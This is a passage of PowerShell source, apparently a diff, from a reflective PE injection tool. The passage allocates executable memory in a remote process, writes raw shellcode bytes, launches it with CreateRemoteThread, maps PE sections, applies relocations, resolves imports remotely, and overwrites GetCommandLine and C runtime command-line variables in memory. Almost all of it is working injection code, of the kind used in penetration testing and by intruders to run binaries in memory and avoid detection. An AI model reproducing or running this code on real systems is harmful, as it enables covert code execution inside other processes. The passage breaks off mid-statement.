$RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + if ($RFuncNamePtr -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process" + } + + [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten) + [System.Runtime.InteropServices.Marshal]::FreeHGlobal($FunctionNamePtr) + if ($Success -eq $false) + { + Throw "Unable to write DLL path to remote process memory" + } + if ($FunctionNameSize -ne $NumBytesWritten) + { + Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process" + } + + #Get address of GetProcAddress + $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll") + $GetProcAddressAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "GetProcAddress") #Kernel32 loaded to the same address for all processes + + + #Allocate memory for the address returned by GetProcAddress + $GetProcAddressRetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UInt64][UInt64]$PtrSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE) + if ($GetProcAddressRetMem -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process for the return value of GetProcAddress" + } + + + #Write Shellcode to the remote process which will call GetProcAddress + #Shellcode: GetProcAddress.asm + #todo: need to have detection for when to get by ordinal + [Byte[]]$GetProcAddressSC = @() + if ($PEInfo.PE64Bit -eq $true) + { + $GetProcAddressSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9) + $GetProcAddressSC2 = @(0x48, 0xba) + $GetProcAddressSC3 = @(0x48, 0xb8) + $GetProcAddressSC4 = @(0xff, 0xd0, 0x48, 0xb9) + $GetProcAddressSC5 = @(0x48, 0x89, 0x01, 0x48, 0x89, 0xdc, 0x5b, 0xc3) + } + else + { + $GetProcAddressSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xc0, 0xb8) + $GetProcAddressSC2 = @(0xb9) + $GetProcAddressSC3 = @(0x51, 0x50, 0xb8) + $GetProcAddressSC4 = @(0xff, 0xd0, 0xb9) + $GetProcAddressSC5 = @(0x89, 0x01, 0x89, 0xdc, 0x5b, 0xc3) + } + $SCLength = $GetProcAddressSC1.Length + $GetProcAddressSC2.Length + $GetProcAddressSC3.Length + $GetProcAddressSC4.Length + $GetProcAddressSC5.Length + ($PtrSize * 4) + $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength) + $SCPSMemOriginal = $SCPSMem + + Write-BytesToMemory -Bytes $GetProcAddressSC1 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($RemoteDllHandle, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $GetProcAddressSC2 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC2.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($RFuncNamePtr, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $GetProcAddressSC3 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC3.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressAddr, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $GetProcAddressSC4 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC4.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($GetProcAddressRetMem, $SCPSMem, $false) + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize) + Write-BytesToMemory -Bytes $GetProcAddressSC5 -MemoryAddress $SCPSMem + $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($GetProcAddressSC5.Length) + + $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE) + if ($RSCAddr -eq [IntPtr]::Zero) + { + Throw "Unable to allocate memory in the remote process for shellcode" + } + + $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten) + if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength)) + { + Throw "Unable to write shellcode to remote process memory." + } + + $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions + $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000) + if ($Result -ne 0) + { + Throw "Call to CreateRemoteThread to call GetProcAddress failed." + } + + #The process address is written to memory in the remote process at address $GetProcAddressRetMem, read this memory + [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) + $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $GetProcAddressRetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten) + if (($Result -eq $false) -or ($NumBytesWritten -eq 0)) + { + Throw "Call to ReadProcessMemory failed" + } + [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [IntPtr]) + + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RFuncNamePtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $GetProcAddressRetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null + + return $ProcAddress + } + + + Function Copy-Sections + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Byte[]] + $PEBytes, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 3, Mandatory = $true)] + [System.Object] + $Win32Types + ) + + for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) + { + [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_SECTION_HEADER))) + $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, $Win32Types.IMAGE_SECTION_HEADER) + + #Address to copy the section to + [IntPtr]$SectionDestAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$SectionHeader.VirtualAddress)) + + #SizeOfRawData is the size of the data on disk, VirtualSize is the minimum space that can be allocated + # in memory for the section. If VirtualSize > SizeOfRawData, pad the extra spaces with 0. If + # SizeOfRawData > VirtualSize, it is because the section stored on disk has padding that we can throw away, + # so truncate SizeOfRawData to VirtualSize + $SizeOfRawData = $SectionHeader.SizeOfRawData + + if ($SectionHeader.PointerToRawData -eq 0) + { + $SizeOfRawData = 0 + } + + if ($SizeOfRawData -gt $SectionHeader.VirtualSize) + { + $SizeOfRawData = $SectionHeader.VirtualSize + } + + if ($SizeOfRawData -gt 0) + { + Test-MemoryRangeValid -DebugString "Copy-Sections::MarshalCopy" -PEInfo $PEInfo -StartAddress $SectionDestAddr -Size $SizeOfRawData | Out-Null + [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, [Int32]$SectionHeader.PointerToRawData, $SectionDestAddr, $SizeOfRawData) + } + + #If SizeOfRawData is less than VirtualSize, set memory to 0 for the extra space + if ($SectionHeader.SizeOfRawData -lt $SectionHeader.VirtualSize) + { + $Difference = $SectionHeader.VirtualSize - $SizeOfRawData + [IntPtr]$StartAddress = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$SectionDestAddr) ([Int64]$SizeOfRawData)) + Test-MemoryRangeValid -DebugString "Copy-Sections::Memset" -PEInfo $PEInfo -StartAddress $StartAddress -Size $Difference | Out-Null + $Win32Functions.memset.Invoke($StartAddress, 0, [IntPtr]$Difference) | Out-Null + } + } + } + + + Function Update-MemoryAddresses + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 1, Mandatory = $true)] + [Int64] + $OriginalImageBase, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Constants, + + [Parameter(Position = 3, Mandatory = $true)] + [System.Object] + $Win32Types + ) + + [Int64]$BaseDifference = 0 + $AddDifference = $true #Track if the difference variable should be added or subtracted from variables + [UInt32]$ImageBaseRelocSize = [System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_BASE_RELOCATION) + + #If the PE was loaded to its expected address or there are no entries in the BaseRelocationTable, nothing to do + if (($OriginalImageBase -eq [Int64]$PEInfo.EffectivePEHandle) ` + -or ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.Size -eq 0)) + { + return + } + + + elseif ((Compare-Val1GreaterThanVal2AsUInt ($OriginalImageBase) ($PEInfo.EffectivePEHandle)) -eq $true) + { + $BaseDifference = Sub-SignedIntAsUnsigned ($OriginalImageBase) ($PEInfo.EffectivePEHandle) + $AddDifference = $false + } + elseif ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.EffectivePEHandle) ($OriginalImageBase)) -eq $true) + { + $BaseDifference = Sub-SignedIntAsUnsigned ($PEInfo.EffectivePEHandle) ($OriginalImageBase) + } + + #Use the IMAGE_BASE_RELOCATION structure to find memory addresses which need to be modified + [IntPtr]$BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.BaseRelocationTable.VirtualAddress)) + while($true) + { + #If SizeOfBlock == 0, we are done + $BaseRelocationTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($BaseRelocPtr, $Win32Types.IMAGE_BASE_RELOCATION) + + if ($BaseRelocationTable.SizeOfBlock -eq 0) + { + break + } + + [IntPtr]$MemAddrBase = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$BaseRelocationTable.VirtualAddress)) + $NumRelocations = ($BaseRelocationTable.SizeOfBlock - $ImageBaseRelocSize) / 2 + + #Loop through each relocation + for($i = 0; $i -lt $NumRelocations; $i++) + { + #Get info for this relocation + $RelocationInfoPtr = [IntPtr](Add-SignedIntAsUnsigned ([IntPtr]$BaseRelocPtr) ([Int64]$ImageBaseRelocSize + (2 * $i))) + [UInt16]$RelocationInfo = [System.Runtime.InteropServices.Marshal]::PtrToStructure($RelocationInfoPtr, [UInt16]) + + #First 4 bits is the relocation type, last 12 bits is the address offset from $MemAddrBase + [UInt16]$RelocOffset = $RelocationInfo -band 0x0FFF + [UInt16]$RelocType = $RelocationInfo -band 0xF000 + for ($j = 0; $j -lt 12; $j++) + { + $RelocType = [Math]::Floor($RelocType / 2) + } + + #For DLL's there are two types of relocations used according to the following MSDN article. One for 64bit and one for 32bit. + #This appears to be true for EXE's as well. + # Site: http://msdn.microsoft.com/en-us/magazine/cc301808.aspx + if (($RelocType -eq $Win32Constants.IMAGE_REL_BASED_HIGHLOW) ` + -or ($RelocType -eq $Win32Constants.IMAGE_REL_BASED_DIR64)) + { + #Get the current memory address and update it based off the difference between PE expected base address and actual base address + [IntPtr]$FinalAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$MemAddrBase) ([Int64]$RelocOffset)) + [IntPtr]$CurrAddr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FinalAddr, [IntPtr]) + + if ($AddDifference -eq $true) + { + [IntPtr]$CurrAddr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) + } + else + { + [IntPtr]$CurrAddr = [IntPtr](Sub-SignedIntAsUnsigned ([Int64]$CurrAddr) ($BaseDifference)) + } + + [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null + } + elseif ($RelocType -ne $Win32Constants.IMAGE_REL_BASED_ABSOLUTE) + { + #IMAGE_REL_BASED_ABSOLUTE is just used for padding, we don't actually do anything with it + Throw "Unknown relocation found, relocation value: $RelocType, relocationinfo: $RelocationInfo" + } + } + + $BaseRelocPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$BaseRelocPtr) ([Int64]$BaseRelocationTable.SizeOfBlock)) + } + } + + + Function Import-DllImports + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Types, + + [Parameter(Position = 3, Mandatory = $true)] + [System.Object] + $Win32Constants, + + [Parameter(Position = 4, Mandatory = $false)] + [IntPtr] + $RemoteProcHandle + ) + + $RemoteLoading = $false + if ($PEInfo.PEHandle -ne $PEInfo.EffectivePEHandle) + { + $RemoteLoading = $true + } + + if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0) + { + [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress) + + while ($true) + { + $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, $Win32Types.IMAGE_IMPORT_DESCRIPTOR) + + #If the structure is null, it signals that this is the end of the array + if ($ImportDescriptor.Characteristics -eq 0 ` + -and $ImportDescriptor.FirstThunk -eq 0 ` + -and $ImportDescriptor.ForwarderChain -eq 0 ` + -and $ImportDescriptor.Name -eq 0 ` + -and $ImportDescriptor.TimeDateStamp -eq 0) + { + Write-Verbose "Done importing DLL imports" + break + } + + $ImportDllHandle = [IntPtr]::Zero + $ImportDllPathPtr = (Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)) + $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr) + + if ($RemoteLoading -eq $true) + { + $ImportDllHandle = Import-DllInRemoteProcess -RemoteProcHandle $RemoteProcHandle -ImportDllPathPtr $ImportDllPathPtr + } + else + { + $ImportDllHandle = $Win32Functions.LoadLibrary.Invoke($ImportDllPath) + } + + if (($ImportDllHandle -eq $null) -or ($ImportDllHandle -eq [IntPtr]::Zero)) + { + throw "Error importing DLL, DLLName: $ImportDllPath" + } + + #Get the first thunk, then loop through all of them + [IntPtr]$ThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.FirstThunk) + [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($ImportDescriptor.Characteristics) #Characteristics is overloaded with OriginalFirstThunk + [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [IntPtr]) + + while ($OriginalThunkRefVal -ne [IntPtr]::Zero) + { + $ProcedureName = '' + #Compare thunkRefVal to IMAGE_ORDINAL_FLAG, which is defined as 0x80000000 or 0x8000000000000000 depending on 32bit or 64bit + # If the top bit is set on an int, it will be negative, so instead of worrying about casting this to uint + # and doing the comparison, just see if it is less than 0 + [IntPtr]$NewThunkRef = [IntPtr]::Zero + if([Int64]$OriginalThunkRefVal -lt 0) + { + $ProcedureName = [Int64]$OriginalThunkRefVal -band 0xffff #This is actually a lookup by ordinal + } + else + { + [IntPtr]$StringAddr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($OriginalThunkRefVal) + $StringAddr = Add-SignedIntAsUnsigned $StringAddr ([System.Runtime.InteropServices.Marshal]::SizeOf([UInt16])) + $ProcedureName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($StringAddr) + } + + if ($RemoteLoading -eq $true) + { + [IntPtr]$NewThunkRef = Get-RemoteProcAddress -RemoteProcHandle $RemoteProcHandle -RemoteDllHandle $ImportDllHandle -FunctionName $ProcedureName + } + else + { + [IntPtr]$NewThunkRef = $Win32Functions.GetProcAddress.Invoke($ImportDllHandle, $ProcedureName) + } + + if ($NewThunkRef -eq $null -or $NewThunkRef -eq [IntPtr]::Zero) + { + Throw "New function reference is null, this is almost certainly a bug in this script. Function: $ProcedureName. Dll: $ImportDllPath" + } + + [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewThunkRef, $ThunkRef, $false) + + $ThunkRef = Add-SignedIntAsUnsigned ([Int64]$ThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr])) + [IntPtr]$OriginalThunkRef = Add-SignedIntAsUnsigned ([Int64]$OriginalThunkRef) ([System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr])) + [IntPtr]$OriginalThunkRefVal = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OriginalThunkRef, [IntPtr]) + } + + $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_IMPORT_DESCRIPTOR)) + } + } + } + + Function Get-VirtualProtectValue + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [UInt32] + $SectionCharacteristics + ) + + $ProtectionFlag = 0x0 + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_EXECUTE) -gt 0) + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) + { + $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READWRITE + } + else + { + $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_READ + } + } + else + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) + { + $ProtectionFlag = $Win32Constants.PAGE_EXECUTE_WRITECOPY + } + else + { + $ProtectionFlag = $Win32Constants.PAGE_EXECUTE + } + } + } + else + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_READ) -gt 0) + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) + { + $ProtectionFlag = $Win32Constants.PAGE_READWRITE + } + else + { + $ProtectionFlag = $Win32Constants.PAGE_READONLY + } + } + else + { + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_WRITE) -gt 0) + { + $ProtectionFlag = $Win32Constants.PAGE_WRITECOPY + } + else + { + $ProtectionFlag = $Win32Constants.PAGE_NOACCESS + } + } + } + + if (($SectionCharacteristics -band $Win32Constants.IMAGE_SCN_MEM_NOT_CACHED) -gt 0) + { + $ProtectionFlag = $ProtectionFlag -bor $Win32Constants.PAGE_NOCACHE + } + + return $ProtectionFlag + } + + Function Update-MemoryProtectionFlags + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Constants, + + [Parameter(Position = 3, Mandatory = $true)] + [System.Object] + $Win32Types + ) + + for( $i = 0; $i -lt $PEInfo.IMAGE_NT_HEADERS.FileHeader.NumberOfSections; $i++) + { + [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.SectionHeaderPtr) ($i * [System.Runtime.InteropServices.Marshal]::SizeOf($Win32Types.IMAGE_SECTION_HEADER))) + $SectionHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($SectionHeaderPtr, $Win32Types.IMAGE_SECTION_HEADER) + [IntPtr]$SectionPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($SectionHeader.VirtualAddress) + + [UInt32]$ProtectFlag = Get-VirtualProtectValue $SectionHeader.Characteristics + [UInt32]$SectionSize = $SectionHeader.VirtualSize + + [UInt32]$OldProtectFlag = 0 + Test-MemoryRangeValid -DebugString "Update-MemoryProtectionFlags::VirtualProtect" -PEInfo $PEInfo -StartAddress $SectionPtr -Size $SectionSize | Out-Null + $Success = $Win32Functions.VirtualProtect.Invoke($SectionPtr, $SectionSize, $ProtectFlag, [Ref]$OldProtectFlag) + if ($Success -eq $false) + { + Throw "Unable to change memory protection" + } + } + } + + #This function overwrites GetCommandLine and ExitThread which are needed to reflectively load an EXE + #Returns an object with addresses to copies of the bytes that were overwritten (and the count) + Function Update-ExeFunctions + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [System.Object] + $PEInfo, + + [Parameter(Position = 1, Mandatory = $true)] + [System.Object] + $Win32Functions, + + [Parameter(Position = 2, Mandatory = $true)] + [System.Object] + $Win32Constants, + + [Parameter(Position = 3, Mandatory = $true)] + [String] + $ExeArguments, + + [Parameter(Position = 4, Mandatory = $true)] + [IntPtr] + $ExeDoneBytePtr + ) + + #This will be an array of arrays. The inner array will consist of: @($DestAddr, $SourceAddr, $ByteCount). This is used to return memory to its original state. + $ReturnArray = @() + + $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([IntPtr]) + [UInt32]$OldProtectFlag = 0 + + [IntPtr]$Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("Kernel32.dll") + if ($Kernel32Handle -eq [IntPtr]::Zero) + { + throw "Kernel32 handle null" + } + + [IntPtr]$KernelBaseHandle = $Win32Functions.GetModuleHandle.Invoke("KernelBase.dll") + if ($KernelBaseHandle -eq [IntPtr]::Zero) + { + throw "KernelBase handle null" + } + + ################################################# + #First overwrite the GetCommandLine() function. This is the function that is called by a new process to get the command line args used to start it. + # We overwrite it with shellcode to return a pointer to the string ExeArguments, allowing us to pass the exe any args we want. + $CmdLineWArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments) + $CmdLineAArgsPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments) + + [IntPtr]$GetCommandLineAAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineA") + [IntPtr]$GetCommandLineWAddr = $Win32Functions.GetProcAddress.Invoke($KernelBaseHandle, "GetCommandLineW") + + if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero) + { + throw "GetCommandLine ptr null. GetCommandLineA: $GetCommandLineAAddr. GetCommandLineW: $GetCommandLineWAddr" + } + + #Prepare the shellcode + [Byte[]]$Shellcode1 = @() + if ($PtrSize -eq 8) + { + $Shellcode1 += 0x48 #64bit shellcode has the 0x48 before the 0xb8 + } + $Shellcode1 += 0xb8 + + [Byte[]]$Shellcode2 = @(0xc3) + $TotalSize = $Shellcode1.Length + $PtrSize + $Shellcode2.Length + + + #Make copy of GetCommandLineA and GetCommandLineW + $GetCommandLineAOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) + $GetCommandLineWOrigBytesPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TotalSize) + $Win32Functions.memcpy.Invoke($GetCommandLineAOrigBytesPtr, $GetCommandLineAAddr, [UInt64]$TotalSize) | Out-Null + $Win32Functions.memcpy.Invoke($GetCommandLineWOrigBytesPtr, $GetCommandLineWAddr, [UInt64]$TotalSize) | Out-Null + $ReturnArray += ,($GetCommandLineAAddr, $GetCommandLineAOrigBytesPtr, $TotalSize) + $ReturnArray += ,($GetCommandLineWAddr, $GetCommandLineWOrigBytesPtr, $TotalSize) + + #Overwrite GetCommandLineA + [UInt32]$OldProtectFlag = 0 + $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) + if ($Success = $false) + { + throw "Call to VirtualProtect failed" + } + + $GetCommandLineAAddrTemp = $GetCommandLineAAddr + Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineAAddrTemp + $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp ($Shellcode1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineAArgsPtr, $GetCommandLineAAddrTemp, $false) + $GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineAAddrTemp $PtrSize + Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineAAddrTemp + + $Win32Functions.VirtualProtect.Invoke($GetCommandLineAAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null + + + #Overwrite GetCommandLineW + [UInt32]$OldProtectFlag = 0 + $Success = $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) + if ($Success = $false) + { + throw "Call to VirtualProtect failed" + } + + $GetCommandLineWAddrTemp = $GetCommandLineWAddr + Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp + $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp ($Shellcode1.Length) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($CmdLineWArgsPtr, $GetCommandLineWAddrTemp, $false) + $GetCommandLineWAddrTemp = Add-SignedIntAsUnsigned $GetCommandLineWAddrTemp $PtrSize + Write-BytesToMemory -Bytes $Shellcode2 -MemoryAddress $GetCommandLineWAddrTemp + + $Win32Functions.VirtualProtect.Invoke($GetCommandLineWAddr, [UInt32]$TotalSize, [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null + ################################################# + + + ################################################# + #For C++ stuff that is compiled with visual studio as "multithreaded DLL", the above method of overwriting GetCommandLine doesn't work. + # I don't know why exactly.. But the msvcr DLL that a "DLL compiled executable" imports has an export called _acmdln and _wcmdln. + # It appears to call GetCommandLine and store the result in this var. Then when you call __wgetcmdln it parses and returns the + # argv and argc values stored in these variables. So the easy thing to do is just overwrite the variable since they are exported. + $DllList = @("msvcr70d.dll", "msvcr71d.dll", "msvcr80d.dll", "msvcr90d.dll", "msvcr100d.dll", "msvcr110d.dll", "msvcr70.dll" ` + , "msvcr71.dll", "msvcr80.dll", "msvcr90.dll", "msvcr100.dll", "msvcr110.dll") + + foreach ($Dll in $DllList) + { + [IntPtr]$DllHandle = $Win32Functions.GetModuleHandle.Invoke($Dll) + if ($DllHandle -ne [IntPtr]::Zero) + { + [IntPtr]$WCmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_wcmdln") + [IntPtr]$ACmdLnAddr = $Win32Functions.GetProcAddress.Invoke($DllHandle, "_acmdln") + if ($WCmdLnAddr -eq [IntPtr]::Zero -or $ACmdLnAddr -eq [IntPtr]::Zero) + { + "Error, couldn't find _wcmdln or _acmdln" + } + + $NewACmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($ExeArguments) + $NewWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArguments) + + #Make a copy of the original char* and wchar_t* so these variables can be returned back to their original state + $OrigACmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ACmdLnAddr, [IntPtr]) + $OrigWCmdLnPtr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($WCmdLnAddr, [IntPtr]) + $OrigACmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) + $OrigWCmdLnPtrStorage = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigACmdLnPtr, $OrigACmdLnPtrStorage, $false) + [System.Runtime.InteropServices.Marshal]::StructureToPtr($OrigWCmdLnPtr, $OrigWCmdLnPtrStorage, $false) + $ReturnArray += ,($ACmdLnAddr, $OrigACmdLnPtrStorage, $PtrSize) + $ReturnArray += ,($WCmdLnAddr, $OrigWCmdLnPtrStorage, $PtrSize) + + $Success = $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($Win32Constants.PAGE_EXECUTE_READWRITE), [Ref]$OldProtectFlag) + if ($Success = $false) + { + throw "Call to VirtualProtect failed" + } + [System.Runtime.InteropServices.Marshal]::StructureToPtr($NewACmdLnPtr, $ACmdLnAddr, $false) + $Win32Functions.VirtualProtect.Invoke($ACmdLnAddr, [UInt32]$PtrSize, [UInt32]($OldProtectFlag), [Ref]$OldProtectFlag) | Out-Null + + $Success = $Win32Functions.VirtualProtect.Invoke($WCmdLnAddr, [UInt32]$PtrSize, 